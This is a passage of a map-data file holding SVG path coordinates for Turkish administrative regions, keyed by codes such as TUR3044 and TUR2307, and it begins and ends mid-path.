0.8-0.4-0.7-0.3 0.6-0.5-0.5-0.4 1.1-0.4 0.5-0.4 0.5-0.5 0.4 0.3 0.4-0.4 0.2-0.7 4-1 1.9 0 2.7 1.5 0.8 0.3 0.6-0.1 0.7-0.2 0.1-0.4-0.8-0.5 0.1-0.7 0.1-1 0.1-0.7 0.8 0 1-0.2 0.5 0.1 1.3 0.3 1.4 0.7 0.7 0.2 2.5-0.3 0.8 0.3 1.9 0.4 0.7 3.3 0 0.8 0.6 0.6 0.2 0.6 0 0.5-0.5 0.3-0.5-0.1-1-0.5-0.9 0.1-0.7 0.4-0.4 0.9-0.1 1.7 0.3 1.9 0.7 1.3 1 1.1 0.8 1.2 1 3.2 0.6 0.9 1 0.9 0.4 0.5 0.3 0.8 0.2 0.3 0 0.7-0.6 0 0 0.4 0.4 1.1 0.7 1.3 0.8 1 1.5 0.9 0.8 1 1.1 1.9 1.3 1.2z\",\r\n    TUR3044: \"M925 298.3l-0.4 6-1.1 3.8 0.9 3.5 1.7 4.4-0.4 5.7-1.3 3.5-0.7 1.3-1.4-1-0.6-0.2-1 0.2-0.4 0.2-0.5 0.5-0.5 0.1-0.8-0.2-6.8-3.7-0.9-0.3-1.6 0.2-2.1 0.5-2 0.9-1.4 1-2.2 0.8-2.1-0.3-4.3-1.5-0.4-0.3-0.3-1.1-0.4-0.4-1.1 0-2.6 1-0.3 0.3-0.3 0.5-0.2 0.9-0.2 0.5-6.6 9.6-0.8 2.2-0.8 0.3-4.5 0.8-3 1-2.3 0.3 0-1.9-0.2-0.9-0.4-0.4-0.6-0.9 1-3.6-0.4-0.9-0.3-0.1-1.8-1.5-0.7-1.3-0.3-0.1-1 0.8-1.6-0.8-0.7-0.1 0-1.7-0.6-0.7-1 0.7-0.7 0.5-2.6 3.5-4 3.7-2.3 1.4-5.8 1.4-1.1-4.1-3.2-2.8-6.1-1.9-0.8-2.7 2.1-2.4 5-2.7 3.9-1.9 0.6-4.4-1.5-5.7-3.1-8.2 7.4 3.6 10.4 0.8 4-4.1 6.9 0.3 10.6 2.7 11 1.6 8.8 0.9 3.2-3.3 0.6-3.7 4.2-2.3 4.4 0.6 4 1.7 1.3 0.3 2.5-0.1 2.6-0.3z\",\r\n    TUR5519: \"M320.9 74.8l-0.9 6-2.6 3-4.8 1.1-6.7 1.2-2.6 1.9-0.2 3.6-1.9 5.1-4 3-5 0.6-5.9-2.5-8.5 0.2-4.3-1.5 1.2-2.1-1.1-1.6-0.5-1.8 0.7-2-0.1-2.1-0.9-1.8-0.4-2.1 1.8-4.1 3-2.8-0.1-1.5-0.3-2 0.1-0.7 7-0.1 1.3-0.8 0.5-0.1 0.7 0 1.1 0.3 0.5 0.1 2.2-0.4 1.1 0.4 0.4-0.1 0.2-0.6 0.3-0.3 2.1-0.8 1.8-1.1 1.2-1.2 2 1.9 8.9 4.4 12.7 1.3z\",\r\n    TUR3019: \"M433.7 128.2l0.6 3.2 2.2 4.9 1.3 1.3 1.2 0.2 1 1.1 0.2 1.5 0.7 2-0.2 2.2-1 1.7-1.4 2.8 0 3.5 0.5 1.3 0.3 1.5-0.2 1.4 0.5 1.4-8.3 8-2.4 7-3.6 5.7-8.4 6.8-5.9 10.3-4.1-8.1-2.1-9.7-1.4-2.6-4.2-5-1.3-5.8 1.6-5.7 1.3-5.8 2.3-5.8 3.9-1.6 6-0.7 0.7-3.9-0.4-4.1 0-4.6 0.7-3.9 0.7-5.6 14.4 4.6 4.8 0.5z\",\r\n    TUR3012: \"M443.4 336.3l-3.7 1.4-3.9 0.3-1.9 0.8-5 3.9-3.8 0.7-1.9 1-1.3 0.2-1.8-0.6-4.3 0.4-4.2 1.6-6.6 0.6-2.1 0.6-1.9 1.2-1.7 1.5-1.7 1.3-2 0.6-1.7 2-0.6 2.9-1.1 1.9-1.9-0.5-0.5-1.2-0.7-0.4-1.5 0.6-2.4 1.5-0.8 0.3-2 0.4 0.1 2.1 1.1 1.3 0.9 1.5 0.5 1.9 0.7 1.7 1.3 0.6 1 1.3 1.1 0.9 2.8 0.7 2.4 1.8 1.2 2-1.3 1.7-2-0.8-1.9-1-0.8 0.2-0.7 0.3-0.7 2.1-0.7 2.4-1.2 1.2-1.7 0.3-3.2-0.2-3.1 0.8-2.9 1.3-3.2 0.1-3.4-0.9-3.4 0.4-1-2.1-2.1-1.1-1.7-1.2-1.4-1.8-2.2-4.4-1.8-4.7 5.9-4.4 7.4-7.4 1.6-2.5 0.2-1.9-0.8-1.8-3.1-0.2-3.2-1.5-0.3-2.3 1.3-4.3 4.9-6.5 6.3-8.6 8.9-9.9 4.9-2 7.8-1 8.1-0.5 5.3-2 2.6-3.4 1.5-2 2.4-1.5 5.1 0.2 2.2 0.8 0.3 3.2-0.1 1 1.1 4.2 5.9 6.5 7.3 7.9 3.5 5.9 1.3 2.6z\",\r\n    TUR3043: \"M893.7 268.6l4.1-0.2 4.2 0.8 3.6 1.4 0.5 4.7-0.1 2.7 0.3 2.7-0.2 2.8-0.7 2.7-0.2 3.8-0.7 1.6-0.6 1.9 2.1 4.9-0.6 3.7-3.2 3.3-8.8-0.9-11-1.6-10.6-2.7-6.9-0.3-4 4.1-10.4-0.8-7.4-3.6-5.5-6.2-9.5-3.9-5.6-5.2-0.4-4.3 1.7-3 6-1.7 2.6-3 1.1-3.6 2.3-2.7 5.4 2 5.6 0.5 4.5-1.2 4.5-1.7 3.5 1.6 3.1 3.1 3.3 2.6 3.8 1.6 3.6 0.9 2.4 1 3.2 2.4 5.3 3 3.5 2.5 2-0.1 1.6-2.4 0.2-3-0.3-2.1 0-2 0.6-0.9 0.6-0.8 1.5-4.4z\",\r\n    TUR4841: \"M619.2 367.7l-3.9 2.6-2.2 0-8.5-1.6-1.1 0.1-3.4 0.9-0.9-0.2-0.9-0.2-0.8-0.1-1 0.4-0.8 0.9-0.4 0.6-0.5 0.1-1.1-0.5-0.9-0.9-0.2-0.8 0.4-2.1 0-1.3-0.4-0.9-2.4-2.2-1-0.6-1.1-0.4-1-0.2-3.2-0.2-9.6-3.4 2.8-2.7 4.3-2 3.5-2.4 0.6-4.4 1.6-1.3 1.9 1 1.6 3.7 3.5 0.7 4 2.7 4.3 4.4 2.2 2.7 1.6-1.1 3.8 2.1 4.8 2.7 4.4 3.9z\",\r\n    TUR3018: \"M566.2 259.2l-2.9 2.8-1.6 4.1-2.6 11.8-1.6 4.2-0.6 4.4-0.1 2 0.3 3.1 1.7 4.1-0.2 2.7-1.7 1.7-1 0.5-1.4 1.9-4 0-4.9 0.3-2.4 4.1-3 6.8-3.5 8.5 0 5.1 1.6 4.8 1.1-0.1 3.4 0.7 1.5 1.2 0.4 0.9 0.6 3.7-0.8 3.3-1.4 4-1.2-0.4-1.1-0.3-1 0.7-4.3 4.9 0 2.7 0.9 1.3-2.1 2.5-0.7 0.6-0.8 0.2-0.5 0.5-1.8 2-0.8 0.6-2 0.5-4.3 0.2-1.9 0.7-0.6 0.6-0.6 1.2-0.4 0-0.1-0.6-0.4-0.3-0.5 1-0.8 0.8-0.5 0.8 0.3 1 0.8-1.1 1.2 0.4 0.2-1.1 0.4 0.3 0.3 0.6 0.3-1-0.3-0.8 0.7-0.4 0.3 0.3 0.2 0.7 0.4 0.3 0.6-0.2 1-0.5 0.7 0.2-3.1 1.5-1.4 1.1-0.8 1.5 0.1 0.7 0.7-0.5 2.3-2.7 0.7-0.5 0.8-0.2-2 2-0.3 0.6-0.4 1.1-0.3 0.6-0.3 0.6 0 1.6-0.5 0.3-0.5 0.1-0.7 0.6-0.5 0.1-1.7 0.1-0.7-0.1-1.6-1.5-0.5-0.3-0.7 0.2-0.5 0.5-0.1 0.5 0.5 0.1 2.2 0.9-2.2-0.6-2.2-0.2-0.5 0.1-1.2 0.7-0.5 0.7-0.4 0.3-1.2 0.4-1.3 1.1-0.7 0-0.8-1.3-1.3-0.5-13.2-8-1.4-0.5-1.7-1.1-1-0.4-1.5-0.1 0-0.1 2.8-1.9 2.2-0.6 1.9-1.8 0.2-1.8-0.2-1.8-0.7-3.7 0-3.7 1.5-4.1-2-2-3.2 0.1-2.4-1.8-1.2-3.8-0.2-6.7-2.5-1.9-1.9-3.7-1.7-3.9-0.1-3.1 0.2-1.4 1.3-2.1 0.9-0.6 0.7-0.8 0.8-2.8-0.4-1.8-1.3-3.3-0.2-3.3 1.6-2.4 2.7 0.2 2.7 0.8 5.1-0.8 6.8-6.9 9 0.7 4.7 1.2 6.4 2.5 2.8-1.3-1.2-12.1 19.4-13.3 2.8-3.9 2.2-4.6 1.5-2 2.2-5.5 2.3-1.9 4-2.3 4.2-1.1 2.7 1.2 2 3.1 1.3 3.5 2.2 2.3z\",\r\n    TUR2229: \"M79.7 308.9l-0.2 0.5-1-2.1 0.5-0.2 0.2 0.3-0.2 0.4 0.7 1.1z m74.9 6.2l-6.9-0.9-3.8-2.1-3.2-2.7-3.8-0.8-2.8 1.9-1.9 3.7-2 1.6-6.3 0.5-3.7-0.2-2.2-1.1-2.4 0-2.4 0.6-2.3-0.4-3.7-2.5-4.2-0.6-2-0.8-1.9-1.2-1.7 0.1-1.6 0.9-0.7 1.1-2.8 6.1-0.6 1.1-0.9 0-0.8 0.5-0.5 0.8-0.2 0.9-0.6 0.6-1.2-0.1 0 0.5 0.7 0.5-0.3 0.3-3.1 0.2-0.7 0.3-0.6 0.5-0.7-0.8-0.4 0-0.3 0.3-0.2-0.7-0.6 0.1-0.7-0.3 0.5-0.6 0.4-0.6 0.1-0.7-0.2-0.8 1.1-0.4 0-0.5-0.5-1.2 0.3-3-0.9 0.3-0.3-0.4-0.4 0-0.7 0.8 0.2-1.1 0.3-1 0.1-1-0.3-1 0.2-0.4-0.4-0.7 0.2-0.7 0.8 0.5 0.5-1 0.1-1.5-0.1-0.7-0.8-0.3-3-2-4.6-1.2-1.9-1.1 0.5-1.3 0.9-0.3 3.5 0.3 1.1-0.2 4.5-1.6 0.7-0.5 1.2-1.5 0.4-1 0.2-1.5 0-1.5 0-0.8-0.9-1.2-0.3-0.7 0.1-1.3 0.8-0.8 0.3-0.8 3.6 0 4.2-1.7 6.3-4.2 2.7-0.4 12.8 1 12.1-3.3 10.1-0.1 1.8-0.7 1.8-1.1 2.1-0.6 2.1-0.3 8.2-3 7.1 0.2 0.6 1.5 0.7 1.4 2.9 2 0.6 2-0.1 2.2 0.8 4-0.4 1.4-1.2 0.9-0.1 1.7 1.1 1.5 0.8 1.7 1.1 1.7 3.4 0.7 0.5 1.5-0.2 1.8-1.6 1.2-2 0.1-2.4 3.4-2.8 2.7-4-0.5-3.7 1-1 2.5 0.6 2.5 1.1 0.6 0.4 0.9 0.3 0.9z\",\r\n    TUR2309: \"M822.5 245.1l0.3 2.3-2 1.1-1.7 0.2-1.7 0.5-2.7 1.3-1.2 1.7-0.4 2.4-1.1 3.6-0.6 3.9 0.7 7.2-0.4 3.7-0.8 1.6-1 1.4-2.4 8-2.1 2.4-2.5 1.8-0.5 1.6 0.5 1.9 0.4 2.5 1.2 2-3.4 1.5-18.2-0.4-5.7 1.2-0.7 1.5-2.4 3.3-4.2 0.3-5.8 4.5-2.6 1-5.7 4-2.3 2.1-5.1 6.6-2.4-2.7-1.8-3.4-1.8-5.3-0.2-1-0.5-1.9-0.8-5 0.4-7.1-0.8-1.6-0.9-0.3-1-0.5-1.3-1.3-1.5-0.6-1 1.6-2.5-1.1-2-1.8-1.7-0.6-1.6-0.8-3.4-2.9-3.2-3.3-2.9-1.4-3.1-0.1-4.2-0.7-4.1-2.2 1.9-1.4 0.5-0.8-0.5-0.9 1.2-2.7 0.4-1.5-0.2-1.8-1.6-1.7-4.2 1.8-1.3-0.9 1.7-6.1-0.2-1.6-0.6-1.4-0.9-1 7.1-1.2 4.3 1.1 4.5 0.4 2.2-1 4-0.6 1.5-0.8 3.9-0.4 4 0.3 1.8-0.6 1.6-1.1 1.3-2 1.1-2.2 0.8-2.1 2.4-0.5 1.2 0.6 1.8 1.4 0.8 0.4 17.5-0.6 6.1-0.2 2.1-1 1.3-2.2 0.1-2 0.3-1.8 2.9-1.5 5.1-0.8 1.8 0.2 2.6 0.7 8.9 0.4 3.4-1 6.5-4 6.3-2.5 2.6-1.8 2.7 3.5 3.5 2.6 0.5 2.6-0.6 2.7 0.7 1.8 1.6 0.5z\",\r\n    TUR2308: \"M811.2 189.3l-1.4 2.6-0.3 1.5 0.8 2 0.3 0.6 0.5 1.3 0 1-0.1 2.1 1.2 2.1 1 1 1.4 2.6 0.4 3-0.7 2.7-3.6 4.5-1.6 5.2 1.1 3.8 1.1 1.6 0.6 0.2 1.2 1 0.6 1.6 0.4 1.7-2.6 1.8-6.3 2.5-6.5 4-3.4 1-8.9-0.4-2.6-0.7-1.8-0.2-5.1 0.8-2.9 1.5-0.3 1.8-0.1 2-1.3 2.2-2.1 1-6.1 0.2-0.2-3.1-0.5-2.9-2.8-4.2 2.4-7.1 1.6 0.3 1.7 0.6 1-1.8 0.7-2.6 0.3-2.4-0.9-2.2-3.2-3.9-1.2-5.2 1-4.7 2.6-3.7 2.2-4.3-1.6-3.2-4.3 1.9-1.8 0.6-11.9 6.4 0.9-2.1 0.4-2.2-1.1-5.1 0.3-1.8 0.6-1.7 0.3-3.3 0.7-1.4 2.6-0.8 3.7 0.2 0.7-0.3 0.5-1.1 0.4-1.3 2.4-1 2.5 0.1 2.5-1.8 1.4-3 0.9-0.7 2.4 0.4 1.4 0.1 2.6-1.2 2-2.5 3.4 1.1 4.6 0.7 4.7-2 1.5-1.1 1.5-0.8 1.6 0.9 5.1 4.8 3.8 1.8 3.2 0.4 2.3 2.7 2.2 3.9z\",\r\n    TUR2307: \"M921.4 148.4l1.2 3.8-0.3 3.3 0 1.6 0.7 2.5 0.9 0.8 1.8 0.7 3.3-2.4 3.5-1.4 1.7 0.3 0.7 0.6 1.7 0.8 1.1 0 1.7 1.2 1.1 2.5 1.6 2.1 4.7 2.2 3.3 0.8 0.3 0.9 0.3 1.1 4.8 0.7 5.2-0.6 3.9 1.2 4 0.5 9.3-2.2 2.1 0.5 0.8 0.7-0.3 1.1-1.7 3.5-0.3 0.9-0.1 1.1 0.3 1.9 0 0.8-0.6 0.8-0.2 1.5 0.2 1.3-0.1 1.2-0.8 1.3-1 0.8-2.7 1.2-1.2 0.3-1.3-0.1-3.6-1.8-1.3-0.2-2.8 0.8-1.2 0.1-1.2-0.1-0.8 0-0.8 0.3-1 0.6-0.6 0.9 0.3 0.8 1.4 1.6-7.4 2-1.9-0.4-0.9-0.3-3.1-0.3-2.5-0.9-2-0.3-2 0.3-1.5 1.1-1.3 1.4-1.8-0.1-4.5-0.8-2.4-1.5-3-3.2-3.6-1.6-4-0.3-2.3 1.8-1.9 2.5-1.8 0.6-3.1 0.6-1.2 0.5-0.4 2 1.9 1.2 2.1 0.8 0.3 2.1-0.3 2.3-0.1 2.4-1.3 1.4-6.1 2.4-9.6 2.2-1.7 1.4-1.9 1.1-2.4 0.8-2.3 1.4-0.2-3.5 0.4-3.3 0.6-2.6-0.1-1-0.3-1 0.3-4.3-1.9-2.8-1.3-1.2-0.9-1.9-1.6-1.9-1.6-1.5-2.2-3.7-1.4-4.3 1.6-2.7 0.5-3.2-0.1-9.2 0.6-1.8 0.7-0.5-7.4-3-4.3-5.2 1.9-0.8 3.9 0.7 1.9-0.6 1.1-1.6 1.2-0.6 0.7-0.1 1.4 0 1.7-1 1.5-1.6 10 2 16.1-4.6 5.6 0.1 2.4 0.6 2.4-0.5 2.8 1.2z\",\r\n    TUR3016: \"M646.2 317.2l-0.9 0.2-0.8-0.1-0.9 0-0.8 0.6-2.3 2.9-1.8 1.8-0.5 0.9-0.4 1.6-1.1 0.9-0.3 0.5-0.6 2.4 0.8 0.5 0.6 0.7 0.4 1 0 1.4-0.3 0-0.4-0.8-0.5-0.1-0.4 0.5-0.2 1.1 0.2 1 0.4 0.9 0.9 1.4 0.3 0.8 0.1 0.6-0.1 1.6-0.3 1.9 0 0.8 0.7 0.7 0.6-0.4 0.5 0.3 0.5 0.6 0.5 0.3 0.4-0.1 1.3-0.6 0.6-0.1 0.6 0.3-0.1 0.7-0.6 1.6 0 1 0.1 0.6 0.8 0.9 1.4 1.3 0.2 0.5 0 1.6 0.3 1.3 0.9 1 0.3 0.6-0.6 0.2-0.5 0.4-0.1 0.8 0.1 0.9 0.3 0.6-0.9 0.6-1.5 0.4-8.4 3.9-8.6 1.8-3.2 1.4-3.7 2.4-4.4-3.9-4.8-2.7-3.8-2.1-1.6 1.1-2.2-2.7-4.3-4.4-4-2.7-3.5-0.7-1.6-3.7-1.9-1-1.6 1.3-0.6 4.4-3.5 2.4-4.3 2-2.8 2.7-0.5-0.6-0.8-0.1-0.7-0.5-0.4-1.4-0.9-0.8-4.2-1.9-3.4-3.4 1.3-2.4 1.9-1.8 3.7-4.7 2.8-5.6 2-3.1 2.4-2.7 6.3-2.9 2.4-3.4 2.6 1.6 1.5 5.9 4 1.3 4.7-5 2.9-1.5 6.5-1.1 7-2.5 3.3-0.4 3.3 0.1 2.2-1.5 0.7-3-0.4-1.9 0.1-2 5.7-1.2 5.7 0.1 6.1 2.3 4.1 3.6z\",\r\n    TUR3008: \"M414.5 123.1l-0.7 5.6-0.7 3.9 0 4.6 0.4 4.1-0.7 3.9-6 0.7-3.9 1.6-2.3 5.8-1.3 5.8-1.6 5.7 1.3 5.8 4.2 5 1.4 2.6 2.1 9.7 4.1 8.1 1.1 3.8 5.9 3.7 2.6 2.2 0.9 0.3 0.7 0.6 0.9 1.3 1 0.8 2.8 0.2 1.7 0.8 0.7 0.7 3.2 1.2-0.3 2.3-1.8 4.4 2.1 5.7-0.2 3.9-4.3 4.1-2 1-4.7-0.1-4.5 1.2-4.3 2.5-4.5 1.2-1.1-2.7-1.7-2.4-1.3-2.5-1.1-2.8-0.2-3.8 0.6-3.9 0.3-3.7-0.3-3.6-2.8-6.5-5.1-3.7-3-1-0.9-0.5-2.3-1.7-2.2 0-1 1.4-0.5 1.7-0.5 3.5-0.7 1.3-2.3-0.4-3-2.3-2.5-0.8-5.3 4.4-1.9 2.5-2.4 1.4-3.9-1.7-3.3 1.6-3.1 2.5-2.2-0.2-1.9-1.8-1.7-0.9-4.4-1.5-2.7 0.3-5.4 1.6-1.9-0.6-7.5-6.2-2.2-1.4-2.3-1 1.3-0.9 2.7-1.3 1-1.4 1.1-0.4 1.1-0.1 1.3-1.2 1-1.7-0.4-2-1.6-1.1-1.1-1.8-0.1-2.6-0.3-1.2 0.5-2.1 0.3-2 0-2.1-0.6-1.4-0.8-1.2-0.2-2.1-0.7-1.4-2.6-2.3-2.6-7.2-0.4-3.4 2.2-2.4-0.1-1.8-0.7-0.5-0.7-1.1-0.4-1-1.8-0.1-1.5-0.9-1.3-2-0.8-2.1-0.2-1.7-0.6-1.2 0-2-2.4 0.3-2.1-1.4-1.9 0.7-3.8 0-2 0.5-1.7-0.6-1.5 0.5-2.2-2.3-1.3 0.2-1.3 0.4-4.8-0.6-1.4 1.2-1.5 1.1-1.4-0.5-1.3-0.9-3-0.3-5 2.2-2.1 0.1-1.2-0.4-0.3-1.4-0.6-4.1-2.2-2.8 3.2-4.3 4.3-2.5 1.6-3.5-0.2-4.1 0.5-2.6 1.3-1.4 4.9 1.7 4.6 2.8 8.8-1 1.7 1.9 1.2 0.6 1.5 0.2 1.6 0.6 1.7 0.2 4.7-1.9 2-0.2 6.5 0.1 4.5-1 3.6-1.7 6.1-1.5 2.2-1.5 2.2-0.7 7.2 1.1 4.2-2.3 1.4-2.5 1.9-2.1 0.9-1.6-2-5.5 0.2-3.7 1.5-1.4 1.9-0.8 4.1-0.2 4.1 0.7 15.3 7.1 1.5 2.1 1.2 2.3 1.7 2 2 1.5 0.9 0.4 2.2 2 1.7 1 1.1 1.7 0.6 2.4 3.4 2.7 3.8-0.5 0.3-1.7 0.5-1.9 1-0.5 1 0.1 1.7 0.6 1.5 1 7.1 2.3z\",\r\n    TUR3010: \"M346.3 54.7l-2.7 3.9-1.9 2.3-0.9 3.6-1.7 5.6 0 6.2-11.2-0.3-3.2-0.9-3.8-0.3-12.7-1.3-8.9-4.4-2-1.9 1.7-1.6 0.7-1 0.4-1 0.2-1.1 0.1-1.4 0.1-0.7 0.5-1.4 0.1-0.8-0.2-0.4-1-0.6-0.2-0.6 0.6-0.9 1.1-0.4 2.4-0.2 0.3-0.3 0.8-1.3 0.3-0.3 0.5-0.1 7.9-3.1 11.1-7.4 6.3-3.1 1.9-1.5 0.5-0.3 4.9-1.7 3 3 3.1 1.4 1.1 3.6 1.9 4.8-1.1 5.9z\",\r\n    TUR2302: \"M766.8 78.1l1.8 4.3 1.3 4.6 0.6 4.8 3.3 8.4-0.6 4.6 0.7 4.4-1 0.2-2.1 0.7-5.4-0.1-2.6 0.5-2.5 0.8-2.3 0.1-4.3-1.4-4.5-0.1-2.1-1.3-3.2-3.6-1.6-0.6-1 0.9 0.3 1.6-0.8 1-1.1 0-2.5-4.2-3.5-2.4-1.7 1.2-0.6 2.8-0.8 0.9-1 0.3-3.2-0.4-12.1-5-3.5-3.6-0.8-4.1-2.2-1.2-0.9 1.2-1 0.9-1.1-0.1-1-0.8-1-2.6-0.4-6.3 0.1-3.5 1.5-8.4 0.4-0.3 0.6-0.2 1.8 0.2 0.9 0.3 1.6 1.4 1.2 0.2 0.9-0.3 1.4-1 1.1-0.2 0.6-0.2 2.8-1.6 0.8-0.9 0.6-0.1 3.3 0.8 0.7 0.7 1.3 1.8 3.1 2.7 2 1.2 2.1 0.4 1-0.4 1.1-0.5 1-0.1 1.4 1 0.6 0 1.2 0 0.4 0.1 3.1 2.5 1 0.5 1 0.2 0.8-0.7 3.3-1.1 1.3-0.1 3 2.8 1.5 1 2.1 0.4 0.8-0.1 1.6-0.7 1.2-0.3 1.9-0.7 1.2-0.8 2.4-0.7 2.7-1.7z\",\r\n    TUR2301: \"M807.2 90.6l-4 2.3-5.6 4.8-2.2 0.8-2.3 0-1.8 0.8-1.6 3.9-3.1 0.9-2.2 0.3-2 0.5-8.5 4.3-0.7-4.4 0.6-4.6-3.3-8.4-0.6-4.8-1.3-4.6-1.8-4.3 5.8-3.9 1.9 0.8 1.5 0.1 1.5-0.4 1.6-1 1.9-1.7 0.7-0.2 1.7-0.2 0.8-0.3 0.6-0.4 3.1-4.2 3.6-2.8 0.6-0.2 0.8 0.1 2.3 0.9 1.3-0.3 1.9-1.3 0.9-0.4 1.1-0.1 1.2-0.5 1.2-0.6 0.9-0.7 2.1-2.2 1.1-0.7 1.3-0.4 1.3 0 1-0.4 0.4-0.3 1.5 3.8 0.4 2.7 1 2.4 1 0.9 1.1 0.7 0.6 1.2 0.5 1.2 2.1 1 1.5 1.7-1.4 3.3-2.8 1.8-0.8 1.4-0.5 1.5-1 1-1.2 0.6-5 5.8-0.7 2.8z\",\r\n    TUR2300: \"M763.1 143.1l-1.6 3.6-0.5 3.9 2.8 1.4 8.9 0.2 3.5 4.6-0.1 1.9 0.2 1.9 0.7 1.4 1 1.2 2 1.4 2.2 1 1.7 1.9-1.2 2.8-1.9 3.6-0.1 4.1-3.4-1.1-4.2-0.1-4.3-0.7-7.7-0.2-1-0.6-2-0.7-0.6-0.1-0.1 0.2-1.7 0.6-2 0.9-1.1 0.2-4.8 1.6-4.1-1-2.8-1.6-1.9 0.6-2.4 3-3.6 1.2-8 1.2-4.1 0-4-0.9-4-0.3-2.1 1.1-2.2 0.6-2.7-0.5-2.7 0.5-5.2 2-1.4 1.1-1 1.8-1.3 0.7-1.5-0.1-0.7 1.1-0.6 1.2-0.6 0.3-3.1 1.1-0.9 2.2 0.7 2 0.7 1.3-1.4 0.9-1.4 0.3-1.2 0.7-0.8 3.8-1.8 1-0.2 1.6 0.2 1.6 0.9 0.7 0.4 4.2-1.6 0.3-1.4 0.7-3.4-4-2.2-1.3-2.3-0.9-5-0.3-4.1-2.1 1.2-1.8 0.4-2.2-0.6-2.2 0.1-1.3 0.2-1.1-0.3-2.1-0.6-1.9-0.1-2.3 0-1.1-0.3-0.8 0.6-0.1 1.5-1.7 1.9-1.2 0.4-1-1.2-1.7-1.7-1.1-1.8-1.8-0.6-2.5 1.2-2.4 0.6-7 2.5-3.5 1.3-2.2 2-1.1 1 0.1 1.1-0.3 0.5-1.8-1.1-1.3-3.8 0.9-3.6 0.1-0.4-2.1 1.9-5.7 2.4-1.3 2.4 1.9 2.5 0.4 2.5-1.8 2.7-0.6 2.4 0.4 2.4 0 1.1-2.6 0.1-3.5 2.3 0.2 4.6-0.3 2.1-1 1.4 0.9 1.5 0.7 1.6 0.2 1.6 0.4 5.6 3.4 2 0.8 1.9 1.2 0.8 1.1 1 0.9 3.1 1 3.1 1.6 3.2 0.3 3-0.3 3.1 0.2 3-0.3 2.8-1.4 5.8-1.4 2.3-2.4 2-3 2.8-1 3 0.2 2.6-0.3 2.1-1.9 2.4-1 8.6 1.8z\",\r\n    TUR3032: \"M773.9 109.2l1.7 4.2 1.5 9.3 1.3 4.2 3.2 1.8 3.4 0.8 1.5 0.6 3.5 0.3 0.1 1.4-1.2 2.5-1.5 1.8-6.5 2.3-2.9 1.4-2.2 2.2-2.3 1.8-1.9 0.3-8.5-1-8.6-1.8-2.4 1-2.1 1.9-2.6 0.3-3-0.2-2.8 1-1.9-4.2-1.1-4.6 0.2-2.3 0.6-2.2 1.7-3.9 0.4-10.1-1.8-10.1 1.1 0 0.8-1-0.3-1.6 1-0.9 1.6 0.6 3.2 3.6 2.1 1.3 4.5 0.1 4.3 1.4 2.3-0.1 2.5-0.8 2.6-0.5 5.4 0.1 2.1-0.7 1-0.2z\",\r\n    TUR3014: \"M221.3 233.6l-0.3 2.8-0.8 2.5-3.2 3.1-0.7 2.6-1 2.8-1.2 1.5 0.1 1.8-6.5 1.5-0.4 4 0.4 3.9-1.7 1.5-1.9 0.6-4 0.1-3.7-0.4-2.6 2 0 0.9-0.7 1.3-0.6 0.1-1.3-0.9-1.4 0.7-1.7 0.6-1.7-0.1-1.7-1.9-1.8-0.3-2.7 1.8-2.9 0-2.8-1.7-3.1-0.7-2-2.1-1.5-0.1-1.4-1 0.5-1 1.4-1.3 1.1-1.7 0.7-2 0.3-3.1-0.3-3.3-0.1-1.6-0.2-1.4-1.2-1.5-1.5-0.5-0.2-2.4 1.5-0.5 1.6-1.7 0.6-1.4 4-3.1 1.9-2 2.9-2.4 3 0 3.2 2 3.5 0.5 3.8-0.2 6.5-1.8 3-0.3 1.3-3.1 0.9-3.7 1.4-0.8 1.4-0.5 3.3 0 6.5 1.5 1.5 0.6 2.5 2.9 0 6.9z\",\r\n    TUR3040: \"M939.5 138.8l-6.9 2.4-6.5 1-2.7 1.3 0 2.6-2 2.3-2.8-1.2-2.4 0.5-2.4-0.6-5.6-0.1-16.1 4.6-10-2-1.6-2.5-1.2-2.7-1.4-2.1-2-0.9-1.1-0.3-0.8-0.7-0.7-1.4-0.9-1.2-1.5-1.1-1.7-0.6-4.5-0.8-1.3-1.4-1.1-1.8-1.8-2.2 1.6-3.7 7.6-2.6 3.3-1.9 1.7-1.4 1.8-1.2 2.2-0.9 2-1.3-1.2-6.9 0.8-2.3 0.4-2.4 6-1.2 6.2-0.6 1-5 0.8-8.2 1.2-5.3 6.2-3.3 17-7.3 5.3-3 3.4-1.1-0.3 1.6 0.5 2.2 0.8 2 1 0.9 2.2 0.3 2.3 1.2 2 1.7 1.7 2 0.6 1.4 0.2 1.3 0.1 1.4 0.3 1.6 0.5 1.3 2.2 3.5 0.5 1.3 0.1 1.2 0.3 4.7-0.1 0.6-1.1 1.9-0.3 0.4 0.4 1.6-2.2 2.6-0.7 1.4 0 1.7-0.3-0.3-0.8-0.2 0.4 0.9-1.2 0.2-1.2 0.8-1.7 2.1 0.2 0.9 1.1 1.3 2.1 1.8 0 0.4-0.8 2.8-0.5 0.8-0.3 1.1 0.5 1.1 1.4 1.3 2.3 3 0.8 1.9-0.9 0.8 0.5 1.2 1.7 2 0.3 0.7-0.5 0.9-2.4 0.5-0.7 0.7 0.7 2z\",\r\n    TUR3047: \"M967.6 287l-0.1 0.5 0.9 1.4 1.8 0.3 3.4-0.4 0.6 0.2 1.9 0.9 0.5 0.4 0.3 0.6 0.5 1.6 0.6 0.7 0.4 0.2 0.7-0.2 0.4 0.3 0 0.3-0.2 1.5 0.4 0.7 0.7 0.1 0.9-0.3 0.6-0.4 1.4-0.2 1.5 0.7 1.3 1.1 1.9 2.4 0.1 0.6-0.5 0.9-1.8 1.4-0.4 0.6-0.3 2 1.1 1.2 1.1 0.9 0.3 1.1-0.5 1.3-0.4 1.7-0.1 1.6 0.5 2.5-0.7 1.9 0.4 1.1 0.7 0.4 1.9 0.2 0.8 0.6 0.7 1.9 0.5 0.5 1.9-0.3 0.5 0.6 0.3 1 0.4 0.9 3 1.9 1.2 1.4-0.1 2.1-0.7 0.8-0.7 0.4-0.6 0.6-0.4 1.2 0.2 1.3 0.5 1.1 0.3 1.1-0.3 1.3-0.7-1.2-1-0.5-5.5-0.8-1 0.1-1.6 0.8-2.1 1.4-1.8 1.8-1.3 1.6-1.3 1.1-1.4 0.7-4.4 1.5-0.4 0.7-0.2 1-0.8 1.4-0.5 1.1-0.5 0.5-0.6 0.1-2.2-0.6-0.5-0.4-0.3-0.7-2.1-4.7-0.4-1.4 0-1.4 0.5-1.3 0.9-1.1 0.6-0.4 1.1-0.4 0.5-0.8 0-1.4-0.3-1.5-0.4-1.5-0.6-1.1-0.9-0.9-1.2-0.7-5-2.1-2.7-0.5-2.4 0.4-1.9 1.6-1.5 2.3-1.6 1.8-2.8 0.5-0.9 1-0.7 0.2-0.4-0.3-1.1-1.1-0.5-0.3-1.3-0.4-1.3-0.1-5.4 